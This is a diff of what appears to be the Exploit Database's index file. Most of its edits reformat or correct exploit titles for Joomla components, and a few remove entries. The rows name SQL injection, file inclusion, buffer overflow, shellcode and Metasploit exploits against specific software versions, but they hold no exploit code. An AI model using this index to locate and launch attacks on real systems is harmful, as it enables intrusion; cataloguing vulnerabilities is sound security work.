14063,platforms/php/webapps/14063.txt,"Joomla! Component 'com_jejob' - Local File Inclusion",2010-06-26,Sid3^effects,php,webapps,0
|
||||
14064,platforms/php/webapps/14064.txt,"Joomla! Component 'jesectionfinder' - Local File Inclusion",2010-06-26,Sid3^effects,php,webapps,0
|
||||
14068,platforms/windows/local/14068.py,"Winamp 5.572 - Local Buffer Overflow (Windows 7 ASLR + DEP Bypass)",2010-06-26,Node,windows,local,0
|
||||
14073,platforms/php/webapps/14073.txt,"2DayBiz Matrimonial Script - smartresult.php SQL Injection",2010-06-27,"Easy Laster",php,webapps,0
|
||||
14070,platforms/php/webapps/14070.txt,"Speedy 1.0 - Arbitrary File Upload",2010-06-26,"ViRuS Qalaa",php,webapps,0
|
||||
|
@ -12443,8 +12443,8 @@ id,file,description,date,author,platform,type,port
|
|||
14123,platforms/php/webapps/14123.txt,"WebDM CMS - SQL Injection",2010-06-29,"Dr.0rYX AND Cr3W-DZ",php,webapps,0
|
||||
14124,platforms/php/webapps/14124.pl,"PHP-Nuke 8.0 - SQL Injection",2010-06-30,Dante90,php,webapps,0
|
||||
14125,platforms/php/webapps/14125.pl,"ShopCartDx 4.30 - (products.php) Blind SQL Injection",2010-06-30,Dante90,php,webapps,0
|
||||
14126,platforms/php/webapps/14126.txt,"Joomla! Component gamesbox com_gamesbox 1.0.2 - 'id' SQL Injection",2010-06-30,v3n0m,php,webapps,0
|
||||
14127,platforms/php/webapps/14127.txt,"Joomla! Component Joomanager - SQL Injection",2010-06-30,Sid3^effects,php,webapps,0
|
||||
14126,platforms/php/webapps/14126.txt,"Joomla! Component 'com_gamesbox' 1.0.2 - 'id' SQL Injection",2010-06-30,v3n0m,php,webapps,0
|
||||
14127,platforms/php/webapps/14127.txt,"Joomla! Component 'Joomanager' - SQL Injection",2010-06-30,Sid3^effects,php,webapps,0
|
||||
14141,platforms/php/webapps/14141.pl,"Oxygen2PHP 1.1.3 - (member.php) SQL Injection",2010-06-30,Dante90,php,webapps,0
|
||||
14132,platforms/php/webapps/14132.html,"webERP 3.11.4 - Multiple Vulnerabilities",2010-06-30,"ADEO Security",php,webapps,0
|
||||
14139,platforms/arm/shellcode/14139.c,"Linux/ARM - Disable ASLR Security Shellcode (102 bytes)",2010-06-30,"Jonathan Salwan",arm,shellcode,0
|
||||
|
@ -12457,9 +12457,9 @@ id,file,description,date,author,platform,type,port
|
|||
14151,platforms/php/webapps/14151.pl,"Oxygen2PHP 1.1.3 - (post.php) Blind SQL Injection",2010-07-01,Dante90,php,webapps,0
|
||||
14152,platforms/php/webapps/14152.pl,"Oxygen2PHP 1.1.3 - (forumdisplay.php) Blind SQL Injection",2010-07-01,Dante90,php,webapps,0
|
||||
14153,platforms/windows/local/14153.pl,"Mediacoder 0.7.3.4682 - Universal Buffer Overflow (SEH)",2010-07-01,Madjix,windows,local,0
|
||||
14154,platforms/php/webapps/14154.txt,"Joomla! Component com_dateconverter 0.1 - SQL Injection",2010-07-01,RoAd_KiLlEr,php,webapps,0
|
||||
14154,platforms/php/webapps/14154.txt,"Joomla! Component 'com_dateconverter' 0.1 - SQL Injection",2010-07-01,RoAd_KiLlEr,php,webapps,0
|
||||
14155,platforms/asp/webapps/14155.txt,"SIDA University System - SQL Injection",2010-07-01,K053,asp,webapps,0
|
||||
14209,platforms/php/webapps/14209.txt,"Joomla! Component Front-End Article Manager System - Arbitrary File Upload",2010-07-04,Sid3^effects,php,webapps,0
|
||||
14209,platforms/php/webapps/14209.txt,"Joomla! Component 'Front-End Article Manager System' - Arbitrary File Upload",2010-07-04,Sid3^effects,php,webapps,0
|
||||
14156,platforms/windows/dos/14156.txt,"Microsoft Windows Vista/Server 2008 - NtUserCheckAccessForIntegrityLevel Use-After-Free",2010-07-01,MSRC,windows,dos,0
|
||||
14165,platforms/php/webapps/14165.txt,"iScripts EasyBiller - Cross-Site Scripting",2010-07-02,Sangteamtham,php,webapps,0
|
||||
14163,platforms/php/webapps/14163.txt,"iScripts ReserveLogic 1.0 - SQL Injection",2010-07-01,"Salvatore Fresta",php,webapps,0
|
||||
|
@ -12470,12 +12470,12 @@ id,file,description,date,author,platform,type,port
|
|||
14176,platforms/php/webapps/14176.c,"iScripts Socialware 2.2.x - Arbitrary File Upload",2010-07-02,"Salvatore Fresta",php,webapps,0
|
||||
14166,platforms/php/webapps/14166.txt,"Bit Weaver 2.7 - Local File Inclusion",2010-07-02,"John Leitch",php,webapps,0
|
||||
14171,platforms/php/webapps/14171.txt,"Iphone Pointter Social Network - Local File Inclusion",2010-07-02,Sid3^effects,php,webapps,0
|
||||
14172,platforms/php/webapps/14172.txt,"Joomla! Component Seyret Video (com_seyret) - Blind SQL Injection",2010-07-02,RoAd_KiLlEr,php,webapps,0
|
||||
14172,platforms/php/webapps/14172.txt,"Joomla! Component 'com_seyret' - Blind SQL Injection",2010-07-02,RoAd_KiLlEr,php,webapps,0
|
||||
14170,platforms/php/webapps/14170.txt,"Pointter Social Network - Local File Inclusion",2010-07-02,Sid3^effects,php,webapps,0
|
||||
14168,platforms/asp/webapps/14168.txt,"VGM Forbin - 'article.asp' SQL Injection",2010-07-02,"Th3 RDX",asp,webapps,0
|
||||
14169,platforms/asp/webapps/14169.txt,"MooreAdvice - 'productlist.asp' SQL Injection",2010-07-02,"Th3 RDX",asp,webapps,0
|
||||
14175,platforms/windows/dos/14175.pl,"Mp3 Digitalbox 2.7.2.0 - '.mp3' Local Stack Overflow (PoC)",2010-07-02,v3n0m,windows,dos,0
|
||||
14183,platforms/php/webapps/14183.txt,"Joomla! Component Seyret (com_seyret) - Local File Inclusion",2010-07-03,"Cooler_ unix",php,webapps,0
|
||||
14183,platforms/php/webapps/14183.txt,"Joomla! Component 'com_seyret' - Local File Inclusion",2010-07-03,"Cooler_ unix",php,webapps,0
|
||||
14179,platforms/windows/remote/14179.txt,"Microsoft IIS 5.0 - Authentication Bypass (MS10-065)",2010-07-02,"Soroush Dalili",windows,remote,0
|
||||
14180,platforms/windows/remote/14180.py,"HP OpenView Network Node Manager (OV NNM) - getnnmdata.exe CGI Invalid MaxAge Remote Code Execution",2010-07-02,"S2 Crew",windows,remote,80
|
||||
14181,platforms/windows/remote/14181.py,"HP OpenView Network Node Manager (OV NNM) - getnnmdata.exe CGI Invalid ICount Remote Code Execution",2010-07-02,"S2 Crew",windows,remote,80
|
||||
|
@ -12485,14 +12485,14 @@ id,file,description,date,author,platform,type,port
|
|||
14185,platforms/multiple/dos/14185.py,"ISC DHCPD - Denial of Service",2010-07-03,sid,multiple,dos,0
|
||||
14191,platforms/windows/local/14191.pl,"ASX to MP3 Converter 3.1.2.1 - Local Buffer Overflow (SEH)",2010-07-03,Madjix,windows,local,0
|
||||
14186,platforms/php/webapps/14186.txt,"Family Connections Who is Chatting AddOn - Remote File Inclusion",2010-07-03,lumut--,php,webapps,0
|
||||
14187,platforms/php/webapps/14187.txt,"Joomla! Component eventcal 1.6.4 com_eventcal - Blind SQL Injection",2010-07-03,RoAd_KiLlEr,php,webapps,0
|
||||
14187,platforms/php/webapps/14187.txt,"Joomla! Component 'com_eventcal' 1.6.4 - Blind SQL Injection",2010-07-03,RoAd_KiLlEr,php,webapps,0
|
||||
14188,platforms/php/webapps/14188.html,"Cpanel 11.25 - Cross-Site Request Forgery (Add FTP Account)",2010-07-03,G0D-F4Th3r,php,webapps,0
|
||||
14190,platforms/arm/shellcode/14190.c,"Linux/ARM - Polymorphic execve(_/bin/sh__ [_/bin/sh_]_ NULL); - XOR 88 encoded Shellcode (78 bytes)",2010-07-03,"Jonathan Salwan",arm,shellcode,0
|
||||
14193,platforms/php/webapps/14193.c,"iscripts Socialware 2.2.x - Multiple Vulnerabilities",2010-07-03,"Salvatore Fresta",php,webapps,0
|
||||
14194,platforms/windows/remote/14194.cpp,"Sun Java Web Server 7.0 u7 - Remote Exploit",2010-07-03,dmc,windows,remote,0
|
||||
14195,platforms/windows/remote/14195.html,"SasCam WebCam Server 2.6.5 - ActiveX Overwrite (SEH)",2010-07-03,blake,windows,remote,0
|
||||
14208,platforms/php/webapps/14208.txt,"Sandbox 2.0.2 - Local File Inclusion",2010-07-04,saudi0hacker,php,webapps,0
|
||||
14196,platforms/php/webapps/14196.txt,"Joomla! Component SocialAds com_socialads - Persistent Cross-Site Scripting",2010-07-03,Sid3^effects,php,webapps,0
|
||||
14196,platforms/php/webapps/14196.txt,"Joomla! Component 'com_socialads' - Persistent Cross-Site Scripting",2010-07-03,Sid3^effects,php,webapps,0
|
||||
14197,platforms/php/webapps/14197.txt,"iScripts MultiCart 2.2 - Multiple SQL Injections",2010-07-03,"Salvatore Fresta",php,webapps,0
|
||||
14198,platforms/php/webapps/14198.txt,"WordPress Plugin Simple:Press 4.3.0 - SQL Injection",2010-07-04,"ADEO Security",php,webapps,0
|
||||
14199,platforms/php/webapps/14199.txt,"PHPaaCMS 0.3.1 - (show.php?id=) SQL Injection",2010-07-04,Shafiq-Ur-Rehman,php,webapps,0
|
||||
|
@ -12503,11 +12503,11 @@ id,file,description,date,author,platform,type,port
|
|||
14204,platforms/php/webapps/14204.txt,"Esoftpro Online Guestbook Pro - Multiple Vulnerabilities",2010-07-04,"L0rd CrusAd3r",php,webapps,0
|
||||
14205,platforms/php/webapps/14205.txt,"Esoftpro Online Photo Pro 2 - Multiple Vulnerabilities",2010-07-04,"L0rd CrusAd3r",php,webapps,0
|
||||
14206,platforms/php/webapps/14206.txt,"Esoftpro Online Contact Manager - Multiple Vulnerabilities",2010-07-04,"L0rd CrusAd3r",php,webapps,0
|
||||
14207,platforms/php/webapps/14207.txt,"Joomla! Component Phoca Gallery (com_phocagallery) - SQL Injection",2010-07-04,RoAd_KiLlEr,php,webapps,0
|
||||
14210,platforms/php/webapps/14210.txt,"Joomla! Component Front-edit Address Book (com_addressbook) - Blind SQL Injection",2010-07-04,Sid3^effects,php,webapps,0
|
||||
14207,platforms/php/webapps/14207.txt,"Joomla! Component 'com_phocagallery' - SQL Injection",2010-07-04,RoAd_KiLlEr,php,webapps,0
|
||||
14210,platforms/php/webapps/14210.txt,"Joomla! Component 'com_addressbook' - Blind SQL Injection",2010-07-04,Sid3^effects,php,webapps,0
|
||||
14222,platforms/windows/remote/14222.py,"UFO: Alien Invasion 2.2.1 - Buffer Overflow (Windows 7 ASLR + DEP Bypass)",2010-07-05,Node,windows,remote,0
|
||||
14211,platforms/php/webapps/14211.txt,"Joomla! Component NijnaMonials (com_ninjamonials) - Blind SQL Injection",2010-07-04,Sid3^effects,php,webapps,0
|
||||
14213,platforms/php/webapps/14213.txt,"Joomla! Component SEF (com_sef) - Local File Inclusion",2010-07-05,_mlk_,php,webapps,0
|
||||
14211,platforms/php/webapps/14211.txt,"Joomla! Component 'com_ninjamonials' - Blind SQL Injection",2010-07-04,Sid3^effects,php,webapps,0
|
||||
14213,platforms/php/webapps/14213.txt,"Joomla! Component 'com_sef' - Local File Inclusion",2010-07-05,_mlk_,php,webapps,0
|
||||
14214,platforms/php/webapps/14214.txt,"bbPress 1.0.2 - Cross-Site Request Forgery (Change Admin Password)",2010-07-05,saudi0hacker,php,webapps,0
|
||||
14215,platforms/windows/local/14215.txt,"SasCam 2.7 - ActiveX Head Buffer Overflow",2010-07-05,blake,windows,local,0
|
||||
14216,platforms/lin_x86/shellcode/14216.c,"Linux/x86 - bind shell port 64533 Shellcode (97 bytes)",2010-07-05,Magnefikko,lin_x86,shellcode,0
|
||||
|
@ -12525,7 +12525,7 @@ id,file,description,date,author,platform,type,port
|
|||
14229,platforms/php/webapps/14229.txt,"Bs Auto_Classifieds Script - 'articlesdetails.php' SQL Injection",2010-07-05,Sid3^effects,php,webapps,0
|
||||
14230,platforms/php/webapps/14230.txt,"Bs Business_Directory Script - SQL Injection / Authentication Bypass",2010-07-05,Sid3^effects,php,webapps,0
|
||||
33410,platforms/php/webapps/33410.txt,"Drupal Module Sections 5.x-1.2/6.x-1.2 - HTML Injection",2009-12-16,"Justin C. Klein Keane",php,webapps,0
|
||||
14232,platforms/php/webapps/14232.txt,"Joomla! Component JPodium (com_jpodium) - SQL Injection",2010-07-05,RoAd_KiLlEr,php,webapps,0
|
||||
14232,platforms/php/webapps/14232.txt,"Joomla! Component 'com_jpodium' - SQL Injection",2010-07-05,RoAd_KiLlEr,php,webapps,0
|
||||
14233,platforms/php/webapps/14233.txt,"Bs Auction Script - SQL Injection",2010-07-05,Sid3^effects,php,webapps,0
|
||||
14234,platforms/linux/shellcode/14234.c,"Linux - 125 bind port to 6778 XOR encoded polymorphic Shellcode (125 bytes)",2010-07-05,gunslinger_,linux,shellcode,0
|
||||
14236,platforms/windows/dos/14236.txt,"Sun Java Web Server 7.0 u7 - Admin Interface Denial of Service",2010-07-06,muts,windows,dos,8800
|
||||
|
@ -12540,7 +12540,7 @@ id,file,description,date,author,platform,type,port
|
|||
14244,platforms/php/webapps/14244.txt,"Lyrics 3.0 - Engine SQL Injection",2010-07-06,Sid3^effects,php,webapps,0
|
||||
14245,platforms/php/webapps/14245.txt,"Pre Multiple Vendors Shopping Malls - SQL Injection / Authentication Bypass",2010-07-06,**RoAd_KiLlEr**,php,webapps,0
|
||||
14248,platforms/windows/remote/14248.py,"minerCPP 0.4b - Remote Buffer Overflow / Format String Attack Exploit",2010-07-06,l3D,windows,remote,0
|
||||
14249,platforms/php/webapps/14249.txt,"Joomla! Component com_autartimonial - SQL Injection",2010-07-06,Sid3^effects,php,webapps,0
|
||||
14249,platforms/php/webapps/14249.txt,"Joomla! Component 'com_autartimonial' - SQL Injection",2010-07-06,Sid3^effects,php,webapps,0
|
||||
14251,platforms/php/webapps/14251.txt,"PsNews 1.3 - SQL Injection",2010-07-06,S.W.T,php,webapps,0
|
||||
14254,platforms/osx/remote/14254.py,"Apple Mac OSX EvoCam Web Server (Snow Leopard) - ROP Remote Exploit",2010-07-06,d1dn0t,osx,remote,0
|
||||
14285,platforms/windows/webapps/14285.txt,"Outlook Web Access 2007 - Cross-Site Request Forgery",2010-07-08,"Rosario Valotta",windows,webapps,0
|
||||
|
@ -13781,7 +13781,7 @@ id,file,description,date,author,platform,type,port
|
|||
15855,platforms/windows/local/15855.py,"Digital Music Pad 8.2.3.4.8 - '.pls' SEH Overflow",2010-12-29,"Abhishek Lyall",windows,local,0
|
||||
15857,platforms/php/webapps/15857.txt,"Discovery TorrentTrader 2.6 - Multiple Vulnerabilities",2010-12-29,EsS4ndre,php,webapps,0
|
||||
15858,platforms/php/webapps/15858.txt,"WordPress 3.0.3 - Persistent Cross-Site Scripting (Internet Explorer 6/7 NS8.1)",2010-12-29,Saif,php,webapps,0
|
||||
15860,platforms/windows/dos/15860.py,"TYPSoft FTP Server 1.10 - 'RETR' Command Denial of Service",2010-12-29,emgent,windows,dos,0
|
||||
15860,platforms/windows/dos/15860.py,"TYPSoft FTP Server 1.10 - 'RETR' Command Denial of Service (2)",2010-12-29,emgent,windows,dos,0
|
||||
15861,platforms/windows/remote/15861.txt,"httpdasm 0.92 - Directory Traversal",2010-12-29,"John Leitch",windows,remote,0
|
||||
15862,platforms/windows/remote/15862.txt,"quickphp Web server 1.9.1 - Directory Traversal",2010-12-29,"John Leitch",windows,remote,0
|
||||
15863,platforms/php/webapps/15863.txt,"lightneasy 3.2.2 - Multiple Vulnerabilities",2010-12-29,"High-Tech Bridge SA",php,webapps,0
|
||||
|
@ -14715,7 +14715,7 @@ id,file,description,date,author,platform,type,port
|
|||
16903,platforms/php/remote/16903.rb,"OpenX - banner-edit.php Arbitrary File Upload / PHP Code Execution (Metasploit)",2010-09-20,Metasploit,php,remote,0
|
||||
16904,platforms/php/webapps/16904.rb,"Trixbox CE 2.6.1 - langChoice PHP Local File Inclusion (Metasploit)",2011-01-08,Metasploit,php,webapps,0
|
||||
16905,platforms/cgi/webapps/16905.rb,"AWStats 6.1 < 6.2 - configdir Remote Command Execution (Metasploit)",2009-12-26,Metasploit,cgi,webapps,0
|
||||
16906,platforms/php/webapps/16906.rb,"Joomla! Plugin tinybrowser 1.5.12 - Arbitrary File Upload / Code Execution (Metasploit)",2010-06-15,Metasploit,php,webapps,0
|
||||
16906,platforms/php/webapps/16906.rb,"Joomla! Plugin 'tinybrowser' 1.5.12 - Arbitrary File Upload / Code Execution (Metasploit)",2010-06-15,Metasploit,php,webapps,0
|
||||
16907,platforms/hardware/webapps/16907.rb,"Google Appliance ProxyStyleSheet - Command Execution (Metasploit)",2010-07-01,Metasploit,hardware,webapps,0
|
||||
16908,platforms/cgi/webapps/16908.rb,"Nagios3 - statuswml.cgi Ping Command Execution (Metasploit)",2010-07-14,Metasploit,cgi,webapps,0
|
||||
16909,platforms/php/webapps/16909.rb,"Coppermine Photo Gallery 1.4.14 - picEditor.php Command Execution (Metasploit)",2010-07-03,Metasploit,php,webapps,0
|
||||
|
@ -19595,7 +19595,7 @@ id,file,description,date,author,platform,type,port
|
|||
22304,platforms/multiple/remote/22304.rb,"ManageEngine Security Manager Plus 5.5 build 5505 - SQL Injection (Metasploit)",2012-10-28,Metasploit,multiple,remote,0
|
||||
22305,platforms/windows/remote/22305.rb,"HP Operations Agent Opcode - coda.exe 0x8c Buffer Overflow (Metasploit)",2012-10-29,Metasploit,windows,remote,0
|
||||
22306,platforms/windows/remote/22306.rb,"HP Operations Agent - Opcode coda.exe 0x34 Buffer Overflow (Metasploit)",2012-10-29,Metasploit,windows,remote,0
|
||||
22330,platforms/windows/dos/22330.txt,"Microsoft Excel 2010 - Crash PoC (1)",2012-10-29,coolkaveh,windows,dos,0
|
||||
22330,platforms/windows/dos/22330.txt,"Microsoft Excel 2010 - Crash (PoC) (1)",2012-10-29,coolkaveh,windows,dos,0
|
||||
22332,platforms/unix/local/22332.c,"BSD lpr 2000.05.07/0.48/0.72 / lpr-ppd 0.72 - Local Buffer Overflow (2)",1998-04-22,CMN,unix,local,0
|
||||
22333,platforms/windows/dos/22333.pl,"Qualcomm Eudora 5.0/5.1/6.0 - Long Attachment Filename Denial of Service (1)",2003-03-05,"Paul Szabo",windows,dos,0
|
||||
22334,platforms/windows/dos/22334.pl,"Qualcomm Eudora 5.0/5.1/6.0 - Long Attachment Filename Denial of Service (2)",2003-03-05,"Paul Szabo",windows,dos,0
|
||||
|
@ -21861,7 +21861,6 @@ id,file,description,date,author,platform,type,port
|
|||
24655,platforms/php/webapps/24655.txt,"PHPLinks 2.1.x - Multiple Input Validation Vulnerabilities",2004-10-05,"LSS Security",php,webapps,0
|
||||
24656,platforms/php/remote/24656.txt,"PHP 4.x/5.0.1 - PHP_Variables Remote Memory Disclosure",2004-09-15,"Stefano Di Paola",php,remote,0
|
||||
24657,platforms/php/webapps/24657.txt,"BlackBoard Internet NewsBoard System 1.5.1 - Remote File Inclusion",2004-10-06,"Lin Xiaofeng",php,webapps,0
|
||||
24658,platforms/php/webapps/24658.txt,"Brooky CubeCart 2.0.1 - SQL Injection",2004-10-06,"Pedro Sanches",php,webapps,0
|
||||
24659,platforms/php/webapps/24659.txt,"DCP-Portal 3.7/4.x/5.x - calendar.php Multiple Parameter Cross-Site Scripting",2004-10-06,"Alexander Antipov",php,webapps,0
|
||||
24660,platforms/php/webapps/24660.txt,"DCP-Portal 3.7/4.x/5.x - 'index.php' Multiple Parameter Cross-Site Scripting",2004-10-06,"Alexander Antipov",php,webapps,0
|
||||
24661,platforms/php/webapps/24661.txt,"DCP-Portal 3.7/4.x/5.x - announcement.php cid Parameter Cross-Site Scripting",2004-10-06,"Alexander Antipov",php,webapps,0
|
||||
|
@ -22297,7 +22296,7 @@ id,file,description,date,author,platform,type,port
|
|||
25094,platforms/windows/remote/25094.c,"Microsoft MSN Messenger 6.2.0137 - '.png' Buffer Overflow",2005-02-08,ATmaCA,windows,remote,0
|
||||
25095,platforms/windows/remote/25095.txt,"Microsoft Internet Explorer 5.0.1 - Mouse Event URI Status Bar Obfuscation",2005-02-14,Paul,windows,remote,0
|
||||
25096,platforms/cgi/webapps/25096.txt,"AWStats 5.x/6.x - Debug Remote Information Disclosure",2005-02-14,GHC,cgi,webapps,0
|
||||
25097,platforms/php/webapps/25097.txt,"Brooky CubeCart 2.0.1/2.0.4 - ndex.php language Parameter Cross-Site Scripting",2005-02-14,"John Cobb",php,webapps,0
|
||||
25097,platforms/php/webapps/25097.txt,"Brooky CubeCart 2.0.1/2.0.4 - 'index.php' language Parameter Cross-Site Scripting",2005-02-14,"John Cobb",php,webapps,0
|
||||
25098,platforms/php/webapps/25098.txt,"Brooky CubeCart 2.0.1/2.0.4 - 'index.php' language Parameter Traversal Arbitrary File Access",2005-02-14,"John Cobb",php,webapps,0
|
||||
25099,platforms/php/webapps/25099.txt,"CitrusDB 0.3.6 - importcc.php Arbitrary Database Injection",2005-02-15,"RedTeam Pentesting",php,webapps,0
|
||||
25100,platforms/php/webapps/25100.txt,"CitrusDB 0.3.6 - uploadcc.php Arbitrary Database Injection",2005-02-15,"RedTeam Pentesting",php,webapps,0
|
||||
|
@ -30597,7 +30596,6 @@ id,file,description,date,author,platform,type,port
|
|||
33856,platforms/php/webapps/33856.txt,"Viennabux Beta! - 'cat' Parameter SQL Injection",2010-04-09,"Easy Laster",php,webapps,0
|
||||
33858,platforms/php/webapps/33858.txt,"DBSite wb CMS - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2010-04-21,The_Exploited,php,webapps,0
|
||||
34143,platforms/windows/remote/34143.txt,"XnView 1.97.4 - '.MBM' File Remote Heap Buffer Overflow",2010-06-14,"Mauro Olea",windows,remote,0
|
||||
34144,platforms/php/webapps/34144.txt,"Joomla! Component com_easygb - 'Itemid' Parameter Cross-Site Scripting",2010-06-08,"L0rd CrusAd3r",php,webapps,0
|
||||
34145,platforms/unix/dos/34145.txt,"Python 3.2 - 'audioop' Module Memory Corruption",2010-06-14,haypo,unix,dos,0
|
||||
34146,platforms/php/webapps/34146.txt,"Sell@Site PHP Online Jobs Login - Multiple SQL Injections",2010-06-15,"L0rd CrusAd3r",php,webapps,0
|
||||
34147,platforms/php/webapps/34147.txt,"JForum 2.1.8 - 'Username' Parameter Cross-Site Scripting",2010-06-06,"Adam Baldwin",php,webapps,0
|
||||
|
@ -30727,8 +30725,8 @@ id,file,description,date,author,platform,type,port
|
|||
34002,platforms/windows/remote/34002.c,"TeamViewer 5.0.8232 - Remote Buffer Overflow",2010-05-18,"fl0 fl0w",windows,remote,0
|
||||
34003,platforms/php/webapps/34003.txt,"Joomla! Component Percha Image Attach 1.1 - 'index.php' Controller Parameter Traversal Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0
|
||||
34004,platforms/php/webapps/34004.txt,"Joomla! Component Percha Fields Attach 1.0 - 'index.php' Controller Parameter Traversal Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0
|
||||
34005,platforms/php/webapps/34005.txt,"Joomla! Component Percha Downloads Attach 1.1 - 'index.php' Controller Parameter Traversal Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0
|
||||
34006,platforms/php/webapps/34006.txt,"Joomla! Component Percha Gallery 1.6 Beta - 'index.php' Controller Parameter Traversal Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0
|
||||
34005,platforms/php/webapps/34005.txt,"Joomla! Component 'com_perchadownloadsattach' 1.1 - 'Controller' Parameter Traversal Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0
|
||||
34006,platforms/php/webapps/34006.txt,"Joomla! Component 'com_perchagallery' 1.6 Beta - 'Controller' Parameter Traversal Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0
|
||||
34007,platforms/php/webapps/34007.txt,"Dolibarr CMS 3.5.3 - Multiple Security Vulnerabilities",2014-07-08,"Deepak Rathore",php,webapps,0
|
||||
34008,platforms/php/webapps/34008.txt,"Joomla! Component Percha Multicategory Article 0.6 - 'index.php' Controller Parameter Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0
|
||||
34009,platforms/windows/remote/34009.rb,"Yokogawa CS3000 - BKFSim_vhfd.exe Buffer Overflow (Metasploit)",2014-07-08,Metasploit,windows,remote,20010
|
||||
|
@ -30776,7 +30774,6 @@ id,file,description,date,author,platform,type,port
|
|||
34053,platforms/php/webapps/34053.txt,"ImpressPages CMS 1.0x - 'admin.php' Multiple SQL Injection",2010-05-28,"High-Tech Bridge SA",php,webapps,0
|
||||
34054,platforms/php/webapps/34054.txt,"GR Board 1.8.6 - 'page.php' Remote File Inclusion",2010-05-30,eidelweiss,php,webapps,0
|
||||
34055,platforms/php/webapps/34055.txt,"CMScout 2.08 - Cross-Site Scripting",2010-05-28,XroGuE,php,webapps,0
|
||||
34056,platforms/php/webapps/34056.txt,"Joomla! 1.5.x - Multiple Modules 'search' Parameter Cross-Site Scripting Vulnerabilities",2010-05-28,"Riyaz Ahemed Walikar",php,webapps,0
|
||||
34057,platforms/php/webapps/34057.txt,"wsCMS - 'news.php' Cross-Site Scripting",2010-05-31,cyberlog,php,webapps,0
|
||||
34058,platforms/multiple/dos/34058.txt,"DM Database Server - 'SP_DEL_BAK_EXPIRED' Memory Corruption",2010-05-31,"Shennan Wang HuaweiSymantec SRT",multiple,dos,0
|
||||
34059,platforms/windows/remote/34059.py,"Kolibri Web Server 2.0 - GET Request SEH Exploit",2014-07-14,"Revin Hadi Saputra",windows,remote,0
|
||||
|
@ -30789,11 +30786,10 @@ id,file,description,date,author,platform,type,port
|
|||
34068,platforms/php/webapps/34068.html,"CMS Made Simple 1.x - Cross-Site Scripting / Cross-Site Request Forgery",2010-01-01,"Truong Thao Nguyen",php,webapps,0
|
||||
34069,platforms/windows/dos/34069.html,"Microsoft Internet Explorer 8 - CSS 'expression' Remote Denial of Service",2010-01-01,MustLive,windows,dos,0
|
||||
34070,platforms/php/webapps/34070.txt,"Datetopia Match Agency BiZ - Multiple Cross-Site Scripting Vulnerabilities",2010-01-07,R3d-D3V!L,php,webapps,0
|
||||
34071,platforms/php/webapps/34071.txt,"Joomla! Component com_sar_news - 'id' Parameter SQL Injection",2010-06-02,LynX,php,webapps,0
|
||||
34071,platforms/php/webapps/34071.txt,"Joomla! Component 'com_sar_news' - 'id' Parameter SQL Injection",2010-06-02,LynX,php,webapps,0
|
||||
34072,platforms/php/webapps/34072.txt,"Hexjector 1.0.7.2 - 'hexjector.php' Cross-Site Scripting",2010-06-01,hexon,php,webapps,0
|
||||
34073,platforms/php/webapps/34073.py,"TCExam 10.1.7 - 'admin/code/tce_functions_tcecode_editor.php' Arbitrary File Upload",2010-06-02,"John Leitch",php,webapps,0
|
||||
34136,platforms/multiple/remote/34136.txt,"Plesk Server Administrator (PSA) - 'locale' Parameter Local File Inclusion",2010-06-21,"Pouya Daneshmand",multiple,remote,0
|
||||
34114,platforms/php/webapps/34114.txt,"Joomla! Component Jreservation - Cross-Site Scripting",2010-06-09,Sid3^effects,php,webapps,0
|
||||
34086,platforms/linux/webapps/34086.txt,"BitDefender GravityZone 5.1.5.386 - Multiple Vulnerabilities",2014-07-16,"SEC Consult",linux,webapps,443
|
||||
34087,platforms/php/webapps/34087.txt,"Joomla! Component 'com_youtubegallery' - SQL Injection",2014-07-16,"Pham Van Khanh",php,webapps,80
|
||||
34153,platforms/php/webapps/34153.txt,"2DayBiz ybiz Network Community Script - SQL Injection / Cross-Site Scripting",2010-06-16,Sid3^effects,php,webapps,0
|
||||
|
@ -30807,7 +30803,6 @@ id,file,description,date,author,platform,type,port
|
|||
34083,platforms/php/webapps/34083.txt,"Western Digital My Book World Edition 1.1.16 - 'lang' Parameter Cross-Site Scripting",2009-12-30,emgent,php,webapps,0
|
||||
34084,platforms/php/webapps/34084.txt,"L2Web LineWeb 1.0.5 - Multiple Input Validation Vulnerabilities",2010-01-06,"Ignacio Garrido",php,webapps,0
|
||||
34085,platforms/php/webapps/34085.txt,"WordPress Plugin Gigya Socialize 1.0/1.1.x - Cross-Site Scripting",2010-06-04,MustLive,php,webapps,0
|
||||
34137,platforms/php/webapps/34137.txt,"Joomla! Component com_videowhisper_2wvc - Cross-Site Scripting",2010-06-10,Sid3^effects,php,webapps,0
|
||||
34088,platforms/android/remote/34088.html,"Boat Browser 8.0 / 8.0.1 - Remote Code Execution",2014-07-16,c0otlass,android,remote,0
|
||||
34089,platforms/php/webapps/34089.txt,"Bilboplanet 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2014-07-16,"Vivek N",php,webapps,80
|
||||
34090,platforms/multiple/dos/34090.py,"Node Browserify 4.2.0 - Remote Code Execution",2014-07-16,"Cal Leeming",multiple,dos,0
|
||||
|
@ -30858,7 +30853,7 @@ id,file,description,date,author,platform,type,port
|
|||
34135,platforms/windows/dos/34135.py,"DjVuLibre 3.5.25.3 - Out of Bounds Access Violation",2014-07-22,drone,windows,dos,0
|
||||
34149,platforms/hardware/webapps/34149.txt,"Netgear DGN2200 1.0.0.29_1.7.29_HotS - Password Disclosure",2014-07-23,"Dolev Farhi",hardware,webapps,0
|
||||
34158,platforms/windows/dos/34158.txt,"Chrome Engine 4 - Denial Of Service",2010-06-17,"Luigi Auriemma",windows,dos,0
|
||||
34159,platforms/php/webapps/34159.txt,"Joomla! Component Gallery XML 1.1 - SQL Injection / Local File Inclusion",2010-06-18,jdc,php,webapps,0
|
||||
34159,platforms/php/webapps/34159.txt,"Joomla! Component 'com_galleryxml' 1.1 - SQL Injection / Local File Inclusion",2010-06-18,jdc,php,webapps,0
|
||||
34151,platforms/windows/dos/34151.txt,"Adobe SVG Viewer 3.0 - Circle Transform Remote Code Execution",2010-06-16,h07,windows,dos,0
|
||||
34152,platforms/linux/remote/34152.txt,"CUPS 1.4.2 - Web Interface Information Disclosure",2010-06-15,"Luca Carettoni",linux,remote,0
|
||||
34160,platforms/php/remote/34160.txt,"Omeka 2.2.1 - Remote Code Execution",2014-07-24,LiquidWorm,php,remote,80
|
